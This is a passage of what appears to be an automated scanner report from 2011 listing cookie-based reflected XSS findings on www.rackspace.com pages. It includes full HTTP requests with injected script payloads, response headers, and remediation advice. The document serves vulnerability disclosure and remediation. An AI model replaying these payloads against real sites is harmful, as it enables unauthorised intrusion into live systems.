s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:10:35 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 36882
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ac7d"%3balert(1)//fc8cdae7bd was submitted in the chatslider cookie. This input was echoed as 5ac7d";alert(1)//fc8cdae7bd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/support/promise.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D5ac7d"%3balert(1)//fc8cdae7bd; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b828"><script>alert(1)</script>b93e4c4fdc9 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/support/promise.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D4b828"><script>alert(1)</script>b93e4c4fdc9; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0e37"%3balert(1)//49dff076351 was submitted in the IS_UASrackuid cookie. This input was echoed as a0e37";alert(1)//49dff076351 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/support/servicelevels/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8a0e37"%3balert(1)//49dff076351; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:10:34 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 39983
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec00e"><script>alert(1)</script>340977c3d24 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/support/servicelevels/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8ec00e"><script>alert(1)</script>340977c3d24; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a9b7"><script>alert(1)</script>dbe12882938 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/support/servicelevels/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D8a9b7"><script>alert(1)</script>dbe12882938; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db5c3"%3balert(1)//d85aec81d9 was submitted in the chatslider cookie. This input was echoed as db5c3";alert(1)//d85aec81d9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/support/servicelevels/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Ddb5c3"%3balert(1)//d85aec81d9; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92429"%3balert(1)//66d51c896f4 was submitted in the IS_UASrackuid cookie. This input was echoed as 92429";alert(1)//66d51c896f4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/websites/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f892429"%3balert(1)//66d51c896f4; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fec3"><script>alert(1)</script>1fde6b80a30 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/websites/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f83fec3"><script>alert(1)</script>1fde6b80a30; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44874"><script>alert(1)</script>2d126371dd was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/websites/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D44874"><script>alert(1)</script>2d126371dd; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64797"%3balert(1)//836df8d1912 was submitted in the chatslider cookie. This input was echoed as 64797";alert(1)//836df8d1912 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/websites/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D64797"%3balert(1)//836df8d1912; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8034b"%3balert(1)//36ce831ddf was submitted in the IS_UASrackuid cookie. This input was echoed as 8034b";alert(1)//36ce831ddf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /min/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US38d41377d7def08a22a9a00f4d26f41d; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US38d41377d7def08a22a9a00f4d26f41d8034b"%3balert(1)//36ce831ddf; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1__4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=appssite%20-%20Apps%20Home; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=72; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=A; PHPSESSID=38d41377d7def08a22a9a00f4d26f41d; 